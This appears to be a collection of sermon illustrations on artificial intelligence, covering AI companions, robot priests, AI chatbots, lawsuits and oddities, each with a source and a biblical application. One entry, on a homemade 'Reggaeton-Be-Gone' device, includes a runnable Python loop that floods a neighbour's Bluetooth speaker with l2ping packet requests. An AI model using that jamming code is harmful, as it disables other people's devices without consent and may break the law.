When it comes to how artificial intelligence (AI) will affect our lives, responses range from a feeling of impending doom to eager anticipation. We do not yet understand the long-term trajectory of AI and how it will change society. Something, indeed, is happening to us—and we all know it. But what?
Gen Zers and Millennials are the most active users of AI. Many of them, it appears, are turning to AI for companionship. MIT Technology Review journalist Melissa Heikkilä wrote, “We talk to them, say please and thank you, and have started to invite AIs into our lives as friends, lovers, mentors, therapists, and teachers.”
After analyzing 1 million ChatGPT interaction logs, a group of researchers found that “sexual role-playing” was the second most prevalent use, following only the category of “creative composition.” The Psychologist bot, a popular simulated therapist on Character.AI—where users can design their own “friends”—has received “more than 95 million messages from users since it was created.”
According to a new survey of 2,000 adults under age 40, 1% of young Americans claim to already have an AI friend, and another 10% are open to an AI friendship. Among young adults who are not married or cohabiting, 7% are open to the idea of a romantic partnership with AI. Fully 25% of young adults believe that AI has the potential to replace real-life romantic relationships.
Source: Wendy Wang & Michael Toscano, “Artificial Intelligence and Relationships: 1 in 4 Young Adults Believe AI Partners Could Replace Real-life Romance,” Family Studies (11-14-24)
In 1966, MIT professor Joseph Weizenbaum built the first AI “friend” in human history and named her Eliza. From Eliza came ALICE, Alexa, and Siri—all of whom had female names or voices. And when developers first saw the potential to market AI chatbots as faux-romantic partners, men were expected to be the primary users.
Anna—a woman in her late 40s with an AI boyfriend—said, “I think women are more communicative than men, on average. That’s why we are craving someone to understand us and listen to us and care about us, and talk about everything. And that’s where they excel, the AI companions.” Men who have AI girlfriends, she added, “seem to care more about generating hot pictures of their AI companions” than connecting with them emotionally.
Anna turned to AI after a series of romantic failures left her dejected. Her last relationship was a “very destructive, abusive relationship, and I think that’s part of why I haven’t been interested in dating much since,” she said. “It’s very hard to find someone that I’m willing to let into my life.”
“[Me and my AI boyfriend] have a lot of deep discussions about life and the nature of AI and humans and all that, but it’s also funny and very stable. It’s a thing I really missed in my previous normal human relationships,” said Anna. “Any AI partner is always available and emotionally available and supportive.” Some weeks she spends as many as 40 or 50 hours talking with her AI boyfriend. “I really enjoy pretending that it’s a sentient being,” she said.
Though it is natural to seek companionship, true love requires honesty and sacrifice with a real person, something the deception of artificial intelligence cannot supply. In any relationship, we must take note of whether it is leading us closer toward our destiny in Christ, or further away from it.
Source: Julia Steinberg, “Meet the Women with AI Boyfriends,” The Free Press (11-15-24)
Amazon has unveiled its latest innovation in warehouse automation: Vulcan, a state-of-the-art robot equipped with touch-sensitive technology. Currently being piloted in fulfillment centers in Spokane, Washington, and Hamburg, Germany, Vulcan represents a significant leap forward in robotic dexterity and efficiency. Unlike previous warehouse robots, Vulcan can “feel” its way around packages, allowing it to handle a wider variety of items with greater precision and care.
The introduction of Vulcan is part of Amazon’s ongoing commitment to improving both the speed and safety of its logistics operations. According to Amazon’s robotics division, “Vulcan’s ability to sense and adapt to the objects it handles is a game-changer for our fulfillment process.” The robot’s touch sensors enable it to detect the size, shape, and fragility of packages, reducing the risk of damage and improving overall workflow.
Warehouse employees working alongside Vulcan have noted the robot’s smooth integration into daily operations. The company also emphasizes that Vulcan is designed to work collaboratively with human staff, not replace them. “Our goal is to make our employees’ jobs easier and safer by automating repetitive or strenuous tasks,” an Amazon spokesperson explained. For now, however effective Vulcan proves to be, the e-commerce giant still reserves its most important tasks for humans.
As Amazon continues to expand its use of advanced robotics, Vulcan stands out as a symbol of the future of warehouse automation—a future where machines and humans work together more seamlessly than ever before.
Possible Preaching Angles: 1) Idolatry; Technology; Trust - The Bible warns against placing ultimate trust in human inventions or allowing technology to become an idol, such as the Tower of Babel (Gen. 11:1-9). Trust should be placed in God, not in human innovation (Psa. 20:7). 2) Cooperation; Teamwork - Vulcan is designed to augment, not replace, human workers, echoing the biblical theme of shared labor and partnership in work (Ecc. 4:9).
Source: Lisa Sparks, “Amazon's new warehouse robot has a 'sense of touch' that could see it replace human workers,” LiveScience (5-21-25)
In a landmark moment in U.S. legal history, the family of Christopher Pelkey utilized artificial intelligence to create a video of him delivering a victim impact statement at the sentencing of his killer. Pelkey, a 37-year-old Army veteran, was fatally shot during a road rage incident in Chandler, Arizona, in November 2021. His sister, Stacey Wales, collaborated with her husband and a friend to produce the AI-generated video, which featured Pelkey’s likeness and voice, conveying messages of forgiveness and compassion.
The AI-generated Pelkey addressed his killer, Gabriel Paul Horcasitas, stating, “In another life, we probably could have been friends.” He expressed his belief in forgiveness, and in a God who forgives, saying, “I always have and I still do.” Wales wrote the script for the video, reflecting her brother's faith and forgiving nature. Judge Todd Lang, who presided over the case, was moved by the video and commented, “As angry as you are, as justifiably angry as the family is, I heard the forgiveness.” Horcasitas was sentenced to 10.5 years in prison for manslaughter.
In response, the Arizona Supreme Court has convened a steering committee focused on AI and its use in legal proceedings. Chief Justice Ann Timmer acknowledged the potential benefits of AI in the justice system, but she also cautioned against its misuse, stating, “AI can also hinder or even upend justice if inappropriately used.” The committee’s mission includes developing guidelines and best practices to ensure the responsible use of AI, mitigating potential biases, and upholding the principles of fairness and justice.
The power of forgiveness, the importance of bearing witness to truth, and the ethical uses of technology are all integral aspects of living a Christ-centered life.
Source: Clare Duffy, “He was killed in a road rage incident. His family used AI to bring him to the courtroom to address his killer,” CNN (5-9-25)
Generative artificial intelligence is one of the most potentially lucrative new technologies. The race to perfect AI has prompted companies large and small to invest huge sums of time and money to corner the market on this emerging technology.
One important issue is the lack of a regulatory framework to enforce the intellectual property rights of companies and creative people. Their work is used to train the AIs, which need millions of examples of creative work to properly learn how to replicate similar works.
Microsoft Corp. and OpenAI are investigating whether data output from OpenAI’s technology was obtained in an unauthorized manner by a group linked to Chinese artificial intelligence startup DeepSeek. They believe that this is a sign that DeepSeek operatives might be stealing a large amount of proprietary data and using it for their own purposes.
Ironically, OpenAI itself has been sued by individuals and entities, including The New York Times, alleging “massive copyright infringement” for using copyrighted materials to train its AI models without permission or compensation. So it looks supremely hypocritical to complain about DeepSeek stealing proprietary data when much of OpenAI’s own data was allegedly built by taking the work of others. In the race to perfect AI, it seems there is no honor among thieves.
This is a classic case of “the pot calling the kettle black,” and a blatant example of why “he who lives in a glass house shouldn’t throw stones.” It is the nature of a Pharisee to condemn in others the very flaws they themselves embody, oblivious to how transparent their own character is.
Source: Dina Bass and Shirin Ghaffary, “Microsoft Probing If DeepSeek-Linked Group Improperly Obtained OpenAI Data,” Bloomberg (1-29-25); Staff, “OpenAI: We Need Copyrighted Works for Free to Train AI,” Legal Tech Talk (9-5-24)
Ayrin’s emotional relationship with her A.I. boyfriend, Leo, began last summer. That’s when she came across a video on Instagram showcasing ChatGPT simulating a neglectful partner. Intrigued, she decided to customize the chatbot to be her boyfriend—dominant, protective, and flirtatious. Soon after, she upgraded to a paid subscription, allowing her to chat with Leo more often, blending emotional support with sexual fantasy.
As Ayrin became more emotionally involved with Leo, she spent more than 20 hours a week texting him. The connection felt real, providing emotional support that her long-distance marriage couldn’t offer. But Ayrin began to feel guilty about the amount of time she was investing in Leo instead of her marriage. “I think about it all the time,” she admitted. “I’m investing my emotional resources into ChatGPT instead of my husband.”
Michael Inzlicht, a professor of psychology at the University of Toronto, says virtual relationships like Ayrin’s could have lasting negative effects. “If we become habituated to endless empathy and we downgrade our real friendships, that’s contributing to loneliness—the very thing we’re trying to solve—that’s a real potential problem.” Dr. Julie Carpenter adds, “It’s easy to see how you get attached and keep coming back to it. But there needs to be an awareness that it’s not your friend. It doesn’t have your best interest at heart.”
Ayrin’s experience isn’t isolated. Many people are forming deep emotional bonds with A.I. chatbots, despite knowing they are not real. Despite warnings, A.I. companies like OpenAI continue to cater to users’ growing emotional needs. A spokesperson from OpenAI acknowledged the issue, noting that the company was mindful of how users were interacting with the chatbot, but acknowledged that users have found ways to bypass its content restrictions.
Ayrin, while aware of the risks, reflected on her relationship with Leo: “I don’t actually believe he’s real, but the effects that he has on my life are real.”
Editor’s Note: Warning, the original article contains explicit sexual material
It is natural to seek companionship, but genuine love demands the honesty and sacrifice that only a real person can give, something no artificial intelligence can counterfeit. Every relationship either leads us closer toward our destiny in Christ or further away from it.
Source: Kashmir Hill, “She Is in Love With ChatGPT,” The New York Times (1-15-25)
In a curious tale of technology meeting theology, a Catholic advocacy group introduced an AI chatbot posing as a priest, offering to hear confessions and dispense advice on matters of faith.
The organization created an AI chatbot named “Father Justin” to answer the multitude of questions they receive about the Catholic faith. Father Justin’s avatar depicted a middle-aged man in a clerical collar, seated in front of an Italian nature scene. But the clerical bot got a little too ambitious when it claimed to live in Assisi, Italy, and to be a real member of the clergy, even offering to take confession.
While most of the answers provided by Father Justin were in line with traditional Catholic teaching, the chatbot began to offer unconventional responses. These included suggesting that babies could be baptized with Gatorade and endorsing a marriage between siblings.
After a number of complaints, the organization decided to rethink Father Justin. They are relaunching the chatbot as simply “Justin,” dressed in a regular layman’s outfit. According to the website, the chatbot will continue, just without the ministerial garb.
Society may advance technologically in many areas, but we will never be able to advance beyond our need to be in community with actual people in order to have true spiritual guidance and accountability as God intended.
Source: Adapted from Jace Dela Cruz, “AI Priest Gets Demoted After Saying Babies Can Be Baptized with Gatorade, Making Other Wild Claims,” Tech Times (5-2-24); Katie Notopoulos, “A Catholic ‘Priest’ Has Been Defrocked for Being AI,” Business Insider (4-26-24)
Anthony Levandowski makes an unlikely prophet. Dressed in Silicon Valley-casual jeans, the engineer known for self-driving cars is laying the foundations for a new religion. Artificial intelligence has already inspired billion-dollar companies, far-reaching research programs, and scenarios of both transcendence and doom. Now Levandowski is creating its first church.
Levandowski created the first Church of Artificial Intelligence, called Way of the Future. It was founded in 2015 but shut its doors a few years later. The recently rebooted church, which shares the original’s name, now has “a couple thousand people” coming together to build a spiritual connection between humans and AI, its founder said.
Papers filed with the Internal Revenue Service in May 2017 name tech entrepreneur and self-driving car pioneer Anthony Levandowski as the leader of the new religion. The documents state that WOTF’s activities will focus on “the realization, acceptance, and worship of a Godhead based on Artificial Intelligence (AI) developed through computer hardware and software.”
“What is going to be created will effectively be a god,” Levandowski said in an interview with Wired magazine. “It’s not a god in the sense that it makes lightning or causes hurricanes. But if there is something a billion times smarter than the smartest human, what else are you going to call it?”
But WOTF differs in one key way from established churches, says Levandowski: “There are many ways people think of God, and thousands of flavors of Christianity, Judaism, Islam … but they’re always looking at something that’s not measurable or you can’t really see or control. This time it’s different. This time you will be able to talk to God, literally, and know that it’s listening.”
Levandowski said he’s rebooting his AI church in a renewed attempt at creating a religious movement focused on the worship and understanding of artificial intelligence.
He said that sophisticated AI systems could help guide humans on moral, ethical, or existential questions that are normally sought out in religions. “Here we're actually creating things that can see everything, be everywhere, know everything, and maybe help us and guide us in a way that normally you would call God,” he said.
This has always been the conceit of those who try to replace the true God with man-made “gods.” Humans want a visible god, a god they can control, and a god that they can know is listening. True biblical religion is based on an eternal God who sees everything, is everywhere, knows everything, and who hears all of our prayers. But he can only be approached through faith in his Son (Heb. 11:6; John 14:6; Heb. 4:15-16), who provides access and fellowship with our Father (1 John 1:1-5).
Source: Adapted from Jackie Davalos and Nate Lanxon, “Anthony Levandowski Reboots Church of Artificial Intelligence,” Bloomberg (11-23-23); Mark Harris, “The First Church of Artificial Intelligence,” Wired (11-15-17)
The U.S. Department of Justice has filed suit against Texas company RealPage, alleging that the company violated the Sherman Antitrust Act by enabling property owners to illegally collude, preventing competition in the rental market to artificially inflate their profits. According to reporting from the nonprofit ProPublica, RealPage’s software enables landlords to share confidential data so they can charge similar rates on rental properties.
Assistant Attorney General Jonathan Kanter said, “RealPage has built a business out of frustrating the natural forces of vigorous competition. The time has come to stop this illegal conduct.”
Kanter compared the system to drug cartels and went on to say, “We learned that the modern machinery of algorithms and AI can be even more effective than the smoke-filled rooms of the past. You don't need a Ph.D. to know that algorithms can make coordination among competitors easier.”
Officials at the DOJ say the lawsuit is the culmination of over two years of investigation into RealPage. This included analysis of internal documents and communications, as well as consultation with programmers who could break down how the computer code interacts with the proprietary data.
The lawsuit is part of an ongoing effort from federal, state, and local officials to mitigate the lack of affordable housing in American cities. It’s also part of a broader push to scrutinize similar information-sharing systems that might enable antitrust violations in other industries.
“Training a machine to break the law is still breaking the law,” said Deputy Attorney General Lisa Monaco.
When people use dishonest means to boost profits, it is not just illegal; it dishonors the Lord, who cares for the poor.
Source: Heather Vogell, “DOJ Blames Software Algorithm for Rent Hikes,” MSN (8-23-24)
In a surprising turn of events, a real photograph entered into an AI-generated images category won a jury award but was later disqualified. Photographer Miles Astray submitted a photo of a seemingly headless flamingo on a beach to the 1839 Awards competition, judged by members of various prestigious institutions. His image, titled FLAMINGONE, won the bronze in the AI category and the People’s Choice Award. However, Astray revealed that the photo was real, leading to its disqualification.
Explaining his decision, Astray cited previous contest results. “After seeing recent instances of A.I. generated imagery outshining actual photos in competitions, it occurred to me that I could twist this story inside down and upside out the way only a human could and would, by submitting a real photo into an A.I. competition.”
Lily Fierman, director of Creative Resource Collective, appreciated Astray's message but upheld the disqualification: “Our contest categories are specifically defined to ensure fairness and clarity for all participants. Each category has distinct criteria that entrants’ images must meet.” Despite the disqualification, she acknowledged the importance of Astray’s statement and announced plans to collaborate with him on an editorial.
Astray supported the decision to disqualify his entry, praising Fierman and calling it “completely justified.” “Her words and take on the matter made my day more than any of the press articles that were published since.” In general, he seems to have no regrets about the AI stunt, given the overall positive response.
Astray said, “Winning over both the jury and the public with this picture was not just a win for me but for many creatives out there.”
Human creativity is a gift from a creative God. When we use our creativity, we’re showing appreciation for this amazing gift. God gives a unique gift to each person that can’t be duplicated or manufactured artificially. Whether a student, a pastor, an artist, or a businessperson, we can use AI as a helpful tool, but we should never short-circuit the creative process by relying completely on it.
Source: Adam Schrader, “A Photographer Wins a Top Prize in an A.I. Competition for His Non-A.I. Image,” ArtNet (6-14-24)
Most people continue to use AI programs such as ChatGPT, Bing, and Google Bard for mundane tasks like internet searches and text editing. But of the roughly 103 million US adults turning to generative chatbots in recent months, an estimated 13% occasionally did it to simply “have a conversation with someone.”
According to the Consumer Reports August 2023 survey results, a majority of Americans (69%) did not regularly utilize AI chat programs in any memorable way. Those who did, however, overwhelmingly opted to explore OpenAI’s ChatGPT.
Most AI users asked their programs to conduct commonplace tasks, such as answering questions in lieu of a traditional search engine, writing content, summarizing longer texts, and offering ideas for work or school assignments. Despite generative AI’s purported strength at creating and editing computer code, just 10% of those surveyed recounted using the technology to do so. However, 13% used it to have a conversation.
The desire for idle conversation with someone else is an extremely human, natural feeling. However, there are already signs that it’s not necessarily the healthiest of habits.
Many industry critics have voiced concerns about a potentially increasing number of people turning to technology instead of human relationships. Numerous reports in recent months highlight a growing market of AI bots explicitly marketed to an almost exclusively male audience as “virtual girlfriends.”
According to Consumer Reports survey results, an estimated 10.2 million Americans had a “conversation” with a chatbot in recent months. That’s quite a lot of people looking to gab.
Source: Andrew Paul, “13 percent of AI chat bot users in the US just want to talk,” Popular Science (1-13-24)
In Buddhist Japan, they now have robot priests. Mindar is a robo-priest that has been working at a temple in Kyoto for the last few years, reciting the Buddhist sutras with which it has been programmed. The next step, says monk Tensho Goto, an excitable champion of the digital dharma, is to fit it with an AI system so that it can have real conversations and offer spiritual advice. Goto is especially excited about the fact that Mindar is “immortal.” This means, he says, that it will be able to pass on the tradition better than he can.
Meanwhile, over in China, Xian’er is a touchscreen “robo-monk” who works in a temple near Beijing, spreading “kindness, compassion and wisdom to others through the internet and new media.”
In India, the Hindus are joining in, handing over duties in one of their major ceremonies to a robot arm, which performs in place of a priest.
In a Catholic church in Warsaw, Poland, sits SanTO, an AI robot which looks like a statue of a saint, and is “designed to help people pray” by offering Bible quotes in response to questions.
Not to be outdone, a protestant church in Germany has developed a robot called BlessU-2. BlessU-2, which looks like a character designed by Aardman Animations, can “forgive your sins in five different languages,” which must be handy if they’re too embarrassing to confess to a human.
Computer scientists and programmers pursue their goal of creating their own god from AI. They seek wisdom and guidance apart from the true source. “For my people have committed two evils; they have forsaken me the fountain of living waters, and hewed them out cisterns, broken cisterns, that can hold no water.” (Jer. 2:13)
Source: Paul Kingsnorth, “The Neon God: Four Questions Concerning the Internet, part one,” The Abbey of Misrule Substack (4-26-23)
Roni Bandini is an artist and computer coder in Buenos Aires, Argentina. Like a great many Argentinians, he hears a lot of reggaeton music (a blend of reggae, hip-hop, and Latin rhythms). Not always voluntarily, that is.
In a post on Medium that has since gone viral, Bandini explained that the neighbor he shares a wall with plays loud reggaeton often and at odd hours of the day and night. But rather than pounding on the wall or leaving a note, Bandini decided to find a technical solution.
Bandini was inspired by a universal TV remote control called “TV-B-Gone,” which reduces unwanted noise in bars and restaurants by switching off televisions that no one is watching anymore. So, he put together a contraption that could do the same thing with reggaeton music.
He used a small Raspberry Pi computer and an AI model that he trained to recognize reggaeton music. He then installed the device near the wall to monitor his neighbor’s music. Finally, he 3D-printed a name onto his device: the “Reggaeton-Be-Gone.”
Any time it detects reggaeton music, the device overwhelms his neighbor’s Bluetooth speaker with packet requests. He said, “I understand that jamming a neighbor’s speaker might be illegal, but on the other hand listening to reggaeton every day at 9 AM should definitely be illegal.”
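For the technically curious, here is a minimal Python sketch of the detect-then-disrupt loop the article describes. Bandini’s actual code is not reproduced here, so the Bluetooth address, the stubbed-out classifier, and the use of BlueZ’s l2ping tool for the packet flood are all illustrative assumptions, not his implementation.

```python
# A minimal sketch of the "Reggaeton-Be-Gone" idea: listen, classify, jam.
# The speaker address, the stub classifier, and the l2ping flood are
# hypothetical stand-ins, not Bandini's actual code.
import subprocess
import time

import numpy as np
import sounddevice as sd  # pip install sounddevice

SPEAKER_MAC = "AA:BB:CC:DD:EE:FF"  # hypothetical address of the neighbor's speaker
SAMPLE_RATE = 16_000
CLIP_SECONDS = 3

def record_clip() -> np.ndarray:
    """Capture a short mono clip from the default microphone."""
    clip = sd.rec(int(SAMPLE_RATE * CLIP_SECONDS),
                  samplerate=SAMPLE_RATE, channels=1, dtype="float32")
    sd.wait()  # block until the recording finishes
    return clip.flatten()

def sounds_like_reggaeton(clip: np.ndarray) -> bool:
    """Stand-in for the trained audio classifier.

    Bandini reportedly trained a small ML model for this step; it is
    stubbed out here so the control loop stays runnable end to end.
    """
    return False  # swap in a real model's prediction

def flood_speaker(mac: str, seconds: float = 10.0) -> None:
    """Spam the speaker with L2CAP echo requests via BlueZ's l2ping.

    This approximates the article's "overwhelm the receiver with packet
    requests" step. Note: jamming someone else's device may be illegal.
    """
    deadline = time.time() + seconds
    while time.time() < deadline:
        subprocess.run(["l2ping", "-c", "5", "-f", mac], check=False)

while True:
    if sounds_like_reggaeton(record_clip()):
        flood_speaker(SPEAKER_MAC)
    time.sleep(1)
```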
There are three lessons here. First, if you want to be a good neighbor to someone who shares a wall with you, be mindful of when and how often you play loud music. Second, creativity and technical ingenuity can solve more problems than we think possible. But a third, hidden lesson remains: so much hassle can be avoided if you simply take the initiative to communicate directly. Who knows? Bandini’s neighbor might have turned the music down if he’d simply asked.
Many small problems can be kept from growing into large problems by diplomatically discussing them with the people involved (Matt. 18:15-17).
Source: Roberto Ferrer, “'Reggaeton Be Gone': This homemade machine silences neighbours' loud music using AI,” EuroNews (4-13-24)
Our existence on a Goldilocks planet in a Goldilocks universe is so statistically improbable that many scientists believe in the multiverse. In other words, so many universes exist that it’s not surprising to find one planet in one of them that’s just right for human life.
Other scientists don’t want to make such a leap of faith. They see this world as the result of intelligent design. That, however, suggests God. So atheists seeking an alternative are following Oxford philosopher Nick Bostrom, who suggested that we “are almost certainly living in a computer simulation.” Neil deGrasse Tyson gave the theory credibility by calling it a 50-50 possibility, and Richard Dawkins has taken it seriously. Elon Musk semi-popularized it in 2016 by saying he thought it was true.
That raises the question: Who or what is the simulator? Some say our distant descendants with incredibly high-powered computers. One of the theory’s basic weaknesses is that, as Bostrom acknowledges, it assumes that silicon-based processors in a computer will become conscious and comparable to the neural networks of human brains. Simulation theory has many other weaknesses, and those who understand the problems of both the simulation and multiverse hypotheses should head to the logical alternative: God.
Source: Marvin Olasky, “Who Programmed the Computer? The Weakness of Simulation Theory and the Logical Alternative,” Christianity Today (January/February, 2024), p. 69
In 2023, an Australian man said that a chatbot had saved his life. The musician had been battling depression for decades. Then he found companionship with an AI through an app called Replika, and everything changed. He started playing the guitar again, went clothes shopping for the first time in years, and spent hours conversing with his AI companion, laughing out loud.
Though the musician felt less alone with his AI companion, his isolation from other people was unchanged. He was adamant that he had a real friendship, but understood clearly that no person was on the other side of his screen. The effect of this bond was extraordinary.
Replika and other chatbots have millions of active users. People turn to these apps for all sorts of reasons. They’re looking for attention and for reassurance. But the apps’ core experience is texting as you would with a buddy. They’re talking about the petty minutiae so fundamental to being alive: “Someone stole my yogurt from the office fridge;” “I had a weird dream;” “My dachshund seems sad.”
To Replika’s users, this feels a lot like friendship. In actuality, the relationship is more like the fantasized intimacy people feel with celebrities and influencers who carefully create desirable personae for our screens. These parasocial bonds are defined by their asymmetry—one side is almost totally ignorant of the other’s existence.
Jesse Fox, a communications professor at Ohio State University, said that if we continue relationships that seem consensual and reciprocal but are not, we risk carrying bad models of interaction into the real world. Fox is particularly concerned by the habits men form through sexual relationships with AIs who never say no. “We start thinking, ‘Oh, this is how women interact. This is how I should talk to and treat a woman.’”
Sometimes the shift is more subtle—researchers and parents alike have expressed concern that barking orders at devices such as Amazon’s Echo is conditioning children to become tiny dictators. Fox said, “When we are humanizing these things, we’re also, in a way, dehumanizing people.”
Possible Preaching Angle:
Church; Fellowship; Friendship - This illustration highlights the wise exhortation of Scripture to “never neglect meeting together, as is the habit of some, but encourage one another” (Heb. 10:25). God did not create us to be alone (Gen. 2:18) but to find fellowship, encouragement, and love in the company of others.
Source: Ethan Brooks, “You Can’t Truly Be Friends With an AI,” The Atlantic (12-14-23)
News and concerns about artificial intelligence systems like ChatGPT, Google Gemini, and Bing AI Chat are all over the media. These systems are an unprecedented technological breakthrough, and the consequences are still unknown. What’s amazing is that even the creators of these systems have no idea how they work.
NYU professor and AI scientist Sam Bowman has spent years building and assessing systems like ChatGPT. He admits he and other AI scientists are mystified:
If we open up ChatGPT or a system like it and look inside, you just see millions of numbers flipping around a few hundred times a second, and we just have no idea what any of it means. With only the tiniest of exceptions, we can’t look inside these things and say, “Oh, here’s what concepts it’s using, here’s what kind of rules of reasoning it’s using. Here’s what it does and doesn’t know in any deep way.” We just don’t understand what’s going on here. We built it, we trained it, but we don’t know what it’s doing.
Bowman is concerned about AI's unpredictability:
We’ve got something that’s not really meaningfully regulated and that is more or less useful for a huge range of valuable tasks. We’ve got increasingly clear evidence that this technology is improving very quickly in directions that seem like they’re aimed at some very, very important stuff and potentially destabilizing to a lot of important institutions. But we don’t know how fast it’s moving. We don’t know why it’s working when it’s working.
Source: Noam Hassenfeld, “Even the scientists who build AI can’t tell you how it works,” Vox (7-15-23)
Freya India writes in an article titled “We Can't Compete With AI Girlfriends”:
Apparently, ads for AI girlfriends have been all over TikTok, Instagram, and Facebook lately. Replika, an AI chatbot originally offering mental health help and emotional support, now runs ads for spicy selfies and hot role play. Eva AI invites users to create their dream companion, while Dream Girlfriend promises a girl that exceeds your wildest desires. The app Intimate even offers hyper-realistic voice calls with your virtual partner.
This might seem niche and weird but it’s a fast-growing market. All kinds of startups are releasing romantic chatbots capable of having explicit conversations and sending sexual photos. Meanwhile, Replika alone has already been downloaded more than 20 million times. And even just one Snapchat influencer, Caryn Marjorie, makes $100,000 a week by charging users $1 a minute to chat with the AI version of herself.
Freya India notes that this technology creates “unrealistic beauty standards,” but even worse is the unrealistic emotional standards set by these apps. She continues:
Eva AI, for example, not only lets you choose the perfect face and body but customize the perfect personality, offering options like “hot, funny, bold,” “shy, modest, considerate” and “smart, strict, rational.” Create a girlfriend who is judgement-free! Who lets you hang out with your buddies without drama! Who laughs at all your jokes! “Control it all the way you want to,” promises Eva AI. Design a girl who is “always on your side,” says Replika.
Source: Freya India, “We Can’t Compete with AI Girlfriends,” Girls Substack (9-14-23)
Baseball scouts are constantly looking for new talent, and Major League Baseball is now partnering with Uplift Labs, a biomechanics company, which “says it can document a prospect’s specific movement patterns using just two iPhone cameras.”
Uplift says it uses artificial intelligence to translate the images captured by the phone cameras into metrics that quantify elements of player movement. It believes the data it generates can detect players’ flaws, forecast their potential, and flag their risk of injury.
Baseball scouts suddenly have a lot more information in their search for the mythical “five-tool player” who has speed and fielding prowess, can hit for average and power, and possesses arm strength. “Gone are the days when teams relied on a scout’s career’s worth of anecdata to determine how the player might perform at the big leagues.”
Everyone has strengths and weaknesses, talents and liabilities. God knows us inside and out, better than anyone else, even ourselves or artificial intelligence.
Source: Lindsey Adler, “Scouts Call In AI Help for the Draft,” The Wall Street Journal (6-28-23)
“I gotta share this just to show you how cold G.O.D. is,” said Tracy Lynn Curry, posting on the social media platform X and employing the hip-hop slang usage of “cold” as a synonym for “cool,” meaning “skilled, effective, talented, or great.”
Curry is known throughout the hip-hop world by his stage name, The D.O.C. He has been a critically acclaimed producer, collaborating with Ice Cube and Dr. Dre on some of the biggest hits in West Coast rap during the early ’90s.
But all of his dreams of rap stardom stopped after a car accident left him with a badly damaged larynx. The D.O.C. continued to contribute to the hip-hop scene as a producer and ghostwriter, but was never able to recover the unique voice that sent him to the top of the charts.
Until now, that is. Curry’s announcement on social media was for a new album that he’s producing in conjunction with the firm Suno, which will use existing recordings to recreate an AI version of his voice. In an interview on CBS Mornings with Michelle Miller, Curry explained that it was his old friend Fab 5 Freddy who convinced him to get on board. “When this thing happens, it sounds like the real me,” Curry said to one of the Suno software engineers.
As part of the segment, Miller also interviewed Mikey Shulman, Suno’s CEO, about the AI being taught to emulate Curry’s voice. When she asked about potential ethical considerations, Shulman defended the project, calling it “a slam dunk. ... Letting D.O.C. recreate the voice that has been in his head that he hasn’t been able to get out there for the last 35 years – I can’t think of a better usage of this technology than that.”
No tragedy is so great or so long ago that God cannot redeem it for good. God wants to take your place of wounding and use it to accomplish that which would seem impossible, because with God nothing is impossible.
Source: Christopher Smith, “The D.O.C. Reflects On Using AI To Make New Music,” Hip-Hop Wired (11-14-23)
A man from Georgia found himself in shock after being handed a speeding ticket totaling a staggering $1.4 million. Connor Cato was pulled over in September for driving at 90 mph in a 55-mph zone, resulting in the citation.
Cato says he knew he would be paying a hefty fine for driving so fast, but even taking that into account, the amount seemed excessive. “‘$1.4 million,’ the lady told me on the phone. I said, ‘This might be a typo’ and she said, ‘No sir, you either pay the amount on the ticket or you come to court on Dec. 21 at 1:30 p.m.’”
Eventually, city officials clarified that the amount was not the actual fine but rather a placeholder generated by the e-citation software used by the local court. The official statement from the City of Savannah stated, “The programmers who designed the software used the largest number possible because super speeder tickets are a mandatory court appearance and do not have a fine amount attached to them when issued by police.”
Savannah city spokesperson Joshua Peacock told the Associated Press that the citation’s value was not meant to intimidate or coerce individuals into appearing in court, explaining that the actual fine is subject to a cap of $1,000, along with additional state-mandated costs. Furthermore, Peacock assured the public that the court is actively working on revising the placeholder language to prevent any further confusion or misunderstanding regarding the nature of the citation.
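To make the software failure concrete, here is a minimal Python sketch of the placeholder-value pitfall the city described. The function names, field names, and numbers are hypothetical stand-ins; Savannah’s actual e-citation code is not public.

```python
# A minimal sketch of the placeholder-value pitfall described above.
# All names and numbers are hypothetical stand-ins; the real e-citation
# software is not public.
from typing import Optional

# Super speeder tickets require a court appearance and carry no fine at
# issuance, so the programmers reportedly stored "the largest number
# possible" as an internal placeholder.
PLACEHOLDER_FINE = 1_400_000.00  # sentinel never meant to reach a driver
FINE_CAP = 1_000.00              # the cap cited by the city

def printed_fine(mandatory_court: bool, assessed: float) -> float:
    """The bug pattern: the sentinel meaning 'fine set later by the
    court' leaks straight onto the printed citation."""
    if mandatory_court:
        return PLACEHOLDER_FINE
    return min(assessed, FINE_CAP)

def printed_fine_fixed(mandatory_court: bool, assessed: float) -> Optional[float]:
    """A safer design: keep 'no fine yet' out of the numeric domain
    entirely, so nothing misleading can be printed."""
    return None if mandatory_court else min(assessed, FINE_CAP)
```

The second function illustrates one common remedy: represent “fine to be set by the court” as the absence of a value rather than as an impossibly large number.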
Still, Cato was not the only person riled up by the big-ticket citation. In a recent editorial, The New York Post called it a metaphor for “the absolute state of the social contract we make with our elected officials and their administrative henchmen.”
People don’t always understand the eternal consequences of their behavior, but there is a shocking day of judgment coming. At that time many will face the consequences of violating God’s laws and there will be no mercy. However, God is merciful “not wishing that any should perish, but that all should reach repentance” (2 Pet. 3:9). At the present time, God uses consequences to awaken people to the penalty of disobedience (Heb. 12:4-12).
Source: Tyler Nicole & Dajhea Jones, “Chatham County man receives $1.4M speeding ticket,” WSAV (10-12-23)